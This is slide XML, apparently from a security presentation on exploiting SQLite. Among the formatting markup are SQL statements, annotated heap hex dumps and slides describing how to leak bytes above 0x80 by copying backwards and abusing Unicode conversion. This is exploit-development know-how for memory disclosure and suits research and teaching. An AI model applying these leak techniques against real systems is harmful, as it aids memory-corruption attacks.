            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'sample subject1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'sample content'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VALUES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'sample subject2'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'hello world'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>sqlite_master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'table'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4092700194"/>
      </p:ext>
    </p:extLst>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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3D 60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 54 A4 C3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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480628" y="381594"/>
            <a:ext cx="3566249" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>! = \x21</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>INSERT INTO table2100(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>”) VALUES (‘’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Success</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4" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9864437" y="5344003"/>
            <a:ext cx="267854" cy="21628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Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5534022" y="1012080"/>
            <a:ext cx="2612451" cy="216356"/>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7" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5046877" y="1120258"/>
            <a:ext cx="487145" cy="0"/>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3" name="Curved Connector 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="2"/>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6361523" y="1707161"/>
            <a:ext cx="4115567" cy="3158116"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">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5317788"/>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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3C 60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 54 A4 C3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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21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4" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9522691" y="5344003"/>
            <a:ext cx="609600" cy="21628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Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5534022" y="1012080"/>
            <a:ext cx="2612451" cy="216356"/>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3" name="Curved Connector 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="2"/>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6276086" y="1792597"/>
            <a:ext cx="4115567" cy="2987243"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">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8109871"/>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Unicode problem</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> bytes can be read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Any byte over the 0x80 range is converted into UTF8 first, and then compared</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>How is it possible to leak byte values over 0x80?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2116750826"/>
      </p:ext>
    </p:extLst>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Unicode problem</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> bytes can be read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Any byte over the 0x80 range is converted into UTF8 first, and then compared</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>How is it possible to leak byte values over 0x80?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Solution : Remember that it is possible to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copy backwards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>. Abuse the Unicode Engine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>                    to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>leak bytes the Unicode way </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="emoticon sunglasses icon ext:pngì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼"/>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28269" y="5026091"/>
            <a:ext cx="404325" cy="404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4325212"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 CC 2F A4 C3 21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rgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40 54 A4 C3 21 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00 00 00 00 00 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1468581" y="469900"/>
            <a:ext cx="3733151" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Default Value of Column</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="14" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5201732" y="639939"/>
            <a:ext cx="2988900" cy="6611"/>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4" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8190632" y="541032"/>
            <a:ext cx="2613891" cy="197814"/>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123106972"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 CC 2F A4 C3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 41 05 04 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40 54 A4 C3 21 00 00</a:t>
            </a:r>
            <a:r>
